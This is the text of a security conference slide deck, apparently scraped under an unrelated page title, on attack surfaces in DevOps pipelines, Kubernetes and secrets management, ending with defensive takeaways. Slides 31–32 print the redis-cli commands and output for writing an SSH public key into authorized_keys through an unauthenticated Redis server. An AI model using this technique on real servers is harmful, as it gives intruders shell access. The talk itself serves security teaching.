How to Remove Document Management Hurdles with X-Docs?
Security pitfalls in script-able infrastructure pipelines.
1. $ Whoami
Jesper Larsson
jesper@assured.se - jesper@cure53.de
@herrJesper
https://www.linkedin.com/in/gustafjesperlarsson
I work as a Security Consultant for Assured and Cure53. (it´s complicated)
I do security research on embedded systems and infrastructure as well as penetration
testing, security reviews, architectural assessments.
“Professional provider of opinions” Those are my principles and if you don’t like them… Well I have more…
www.assured.se | www.cure53.de
8. $ The Playing field - Orchestrations, Pipelines
Secrets
Store
DevOps
Peeps
REPO
INFRA
AS
CODE CI / CD Container Orchestration Monitoring
Pipeline
=
Production
Environment
Commit
</>
12. $ One compromise to rule them all
Secrets
Store
DevOps
Peeps
REPO
INFRA
AS
CODE CI / CD Container Orchestration Monitoring
Pipeline
=
Production
Environment
Commit
</>
13. $ Attack Surface
Managing Secrets
Vulnerability management
Configuration management
Firewalling, ACL, ingress/egress, Network and service
segmentation
Privilege management, Role based access controls
Unprotected endpoints, APIs, Services
Repository management
Patch management
Vulnerable sources
Onboarding and offboarding activities Continuous monitoring and auditing
Default Credentials
Security Settings Know Vulnerabilities
Faulty Verifications
18. $ Security Concerns out of the box? A few...
API Authentication
API Authorization
TLS for API traffic
Role Base Authentication
Cloud metadata API Access
Access to kubectl
Access to etcd
Network ACL
Ingress and Egress
Encrypt Secrets at rest
ACL to Kubelets
Container privileges
Pod Security policies
Controlling capabilities in user runtime and of specific workloads
Rotation for infrastructure credentials
Restrict access to alpha and beta features
Image verification
Defense in depth
Pod and node separation
Monitoring
19. $ How bad was is if a etcd instance was breached?
31. $ Using Redis-Cli to gain a SSH-session
(echo -e "nn"; cat id_rsa.pub; echo -e "nn") > key.txt
“
AAAAB3NzaC1yc2EAAAADAQABAAABAQDMw97+kkv6cNlsPZDxQ/Dkxp7b7bfyj/SyvwyMmhEPe3u6TTcxh
AINyKM+FrOVMfCYxI95RecR8RtoUdHf8CcmaCJ7k8VMCSbyRe7bljpQx4T[...]
“
32. $ Using Redis-Cli to gain a SSH-session
cat key.txt | redis-cli –h 172.16.10.132 –x set woop
OK
redis-cli –h 172.16.10.132
172.16.10.132:6379> config set dir /Users/jeslar/.ssh/
OK
172.16.10.132:6379> config get dir
1) “dir”
2) ”/Users/jeslar/.ssh”
172.16.10.132:6379> config set dbfilename “authorized_keys”
OK
172.16.10.132:6379> save
OK
34. • Ensure that that critical security features are enabled and configured correctly
• Use authentication and authorization for all API access. Especially management API
• Adopt the security model of least privileged
• Mange secrets
• Separate cluster for dev/test and production
• Account management, VPCs, Repos
• Zero-trust networking
• Access controls
• Security audits
$ Takeaways